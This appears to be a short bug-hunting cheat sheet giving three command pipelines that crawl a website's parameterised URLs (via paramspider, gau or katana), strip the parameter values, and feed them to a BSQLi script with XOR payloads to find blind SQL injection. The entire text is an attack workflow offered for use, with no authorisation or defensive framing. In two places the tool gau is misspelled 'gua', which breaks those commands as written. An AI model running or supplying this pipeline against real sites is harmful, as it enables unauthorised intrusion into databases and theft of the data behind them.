1.Using paramspider to crawl website links
install paramspider ==> https://github.com/devanshbatham/ParamSpider
install bsqli ==> https://github.com/B1gN0Se/BSQLi
paramspider -d http://www.example.com
cd results
cat your-urls.txt | sed 's/FUZZ//g' >final.txt
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
2.Using gau to crawl website links
install gua ==> https://github.com/lc/gau
install urldedupe ==> https://github.com/ameenmaali/urldedupe
echo example.com | gua --mc 200 | urldedupe >urls.txt
cat urls.txt | grep -E ".php|.asp|.aspx|.cfm|.jsp" | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
3.Using katana to crawl website links
install katana ==> https://github.com/projectdiscovery/katana
echo example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe >output.txt
katana -u http://example.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
Credit to ==> 𝙇𝙤𝙨𝙩𝙨𝙚𝙘